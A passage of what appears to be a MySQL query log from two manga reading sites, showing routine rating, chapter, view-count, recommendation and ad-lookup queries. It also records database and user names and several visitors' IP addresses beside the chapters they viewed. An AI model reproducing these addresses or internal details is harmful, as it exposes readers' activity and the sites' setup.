on u317079482_mangacherri_2 using Socket 330644819 Quit 330644820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330644820 Quit 330644821 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330644823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644822 Quit 330644821 Quit 330644823 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644823 Quit 330644824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330644825 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644824 Quit 330644826 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644825 Quit 330644826 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644826 Quit 330644827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330644827 Quit 330644828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330644828 Quit 330644829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330644829 Quit 330644830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330644830 Quit 330644831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330644831 Quit 330644832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330644832 Quit 330644833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330644833 Quit 330644834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330644834 Quit 330644835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330644835 Quit 330644836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330644836 Quit 330644837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330644837 Quit 330644838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330644838 Quit 330644839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330644839 Quit 330644840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330644840 Quit 330644841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330644841 Quit 330644842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330644842 Quit 330644843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330644843 Quit 330644844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330644844 Quit 330644845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330644845 Quit 330644846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330644846 Quit 330644847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330644847 Quit 330644848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330644848 Quit 330644849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330644849 Quit 330644850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330644850 Quit 330644851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330644851 Quit 330644852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330644852 Quit 330644853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330644853 Quit 330644854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330644854 Quit 330644855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330644855 Quit 330644856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330644856 Quit 330644857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330644857 Quit 330644858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330644858 Quit 330644859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330644859 Quit 330644860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330644860 Quit 330644861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330644861 Quit 330644862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330644862 Quit 330644863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330644863 Quit 330644864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330644864 Quit 330644865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330644865 Quit 330644866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330644866 Quit 330644867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330644867 Quit 330644868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330644868 Quit 330644869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330644869 Quit 330644870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330644870 Quit 330644871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330644871 Quit 330644872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330644872 Quit 330644873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330644873 Quit 330644874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330644874 Quit 330644875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330644875 Quit 330644876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330644876 Quit 330644877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330644877 Quit 330644878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330644878 Quit 330644879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330644879 Quit 330644880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330644880 Quit 330644881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330644881 Quit 330644882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330644882 Quit 330644883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330644883 Quit 330644884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330644884 Quit 330644885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330644885 Quit 330644886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330644886 Quit 330644887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330644887 Quit 330644888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330644888 Quit 330644889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330644889 Quit 330644890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330644890 Quit 330644891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330644891 Quit 330644892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330644892 Quit 330644893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330644893 Quit 330644894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330644894 Quit 330644895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330644895 Quit 330644896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330644896 Quit 330644897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330644897 Quit 330644898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330644898 Quit 330644899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330644899 Quit 330644900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330644900 Quit 330644901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330644901 Quit 330644902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330644902 Quit 330644903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330644903 Quit 330644904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330644904 Quit 330644905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330644905 Quit 330644906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330644906 Quit 330644907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644907 Quit 330644908 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14997' 330644908 Quit 330644909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644909 Query select * FROM chapters where id = '14997' 330644909 Quit 330644910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644910 Query select * FROM chapters where manga_id = '127' order by id desc 330644910 Quit 330644911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644911 Query Update chapters set view=view+1 where id = '14997' 330644911 Quit 330644912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644912 Query select * FROM chapters where id = '14997' 330644912 Quit 330644913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644913 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14997' 330644913 Quit 330644914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644914 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '14997', '2a02:2788:39:fb2f:2079:67cc:a863:aafe', 'mangacherri.com', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644914 Quit 330644915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644915 Query select * FROM chapter_images where chapter_id = '14997' 330644915 Quit 330644916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644916 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330644916 Quit 330644917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644917 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330644918 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644919 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644918 Quit 330644919 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5296' and m.active = 1 330644919 Quit 330644920 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644920 Query select * FROM chapters where id = '5296' 330644920 Quit 330644921 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644921 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330644921 Quit 330644922 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644922 Query Update chapters set view=view+1 where id = '5296' 330644923 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644922 Quit 330644924 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644923 Quit 330644924 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12507' 330644925 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644925 Query select * FROM chapters where id = '5296' 330644924 Quit 330644926 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644926 Query select * FROM chapters where id = '12507' 330644925 Quit 330644926 Quit 330644928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644928 Query select * FROM chapters where manga_id = '193' order by id desc 330644927 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644927 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5296' and m.active = 1 330644928 Quit 330644929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644929 Query Update chapters set view=view+1 where id = '12507' 330644927 Quit 330644930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644930 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '5296', '70.120.10.196', 'mangaberri.com', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644929 Quit 330644931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644931 Query select * FROM chapters where id = '12507' 330644930 Quit 330644932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644932 Query select * FROM chapter_images where chapter_id = '5296' 330644931 Quit 330644934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644933 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12507' 330644934 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330644932 Quit 330644933 Quit 330644936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644934 Quit 330644935 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12507', '205.164.158.33', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644936 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330644935 Quit 330644937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644937 Query select * FROM chapter_images where chapter_id = '12507' 330644937 Quit 330644938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644938 Quit 330644939 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330644939 Quit 330644940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644940 Query select * FROM chapters where manga_id = '193' order by id desc 330644936 Quit 330644940 Quit 330644941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644943 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644942 Quit 330644944 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644941 Quit 330644944 Quit 330644943 Quit 330644945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644945 Quit 330644946 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644946 Quit 330644947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644947 Quit 330644948 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644948 Quit 330644949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644949 Quit 330644950 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644950 Quit 330644548 Quit 330644951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644951 Quit 330644952 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644952 Quit 330644953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644953 Quit 330644954 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644954 Quit 330644955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644955 Quit 330644956 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644956 Quit 330644957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644957 Quit 330644958 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644958 Quit 330644959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644960 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6703' 330644959 Quit 330644960 Quit 330644961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644961 Query select * FROM chapters where id = '6703' 330644961 Quit 330644962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644962 Query select * FROM chapters where manga_id = '129' order by id desc 330644962 Quit 330644963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644963 Query Update chapters set view=view+1 where id = '6703' 330644963 Quit 330644964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644964 Query select * FROM chapters where id = '6703' 330644964 Quit 330644965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644965 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6703' 330644965 Quit 330644966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644966 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('129', '6703', '2401:4900:62dd:6c22:f831:50ff:fecc:d527', 'mangacherri.com', '2026-02-26 03:28:35', '2026-02-26 03:28:35') 330644966 Quit 330644967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644967 Query select * FROM chapter_images where chapter_id = '6703' 330644967 Quit 330644968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644968 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '129' and m.active = 1 330644968 Quit 330644969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644969 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='129' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:36 330644917 Quit 330644970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644970 Quit 330644971 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644971 Quit 330644972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644972 Quit 330644973 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644973 Quit 330644974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644974 Quit 330644975 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644975 Quit 330644976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644976 Quit 330644977 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 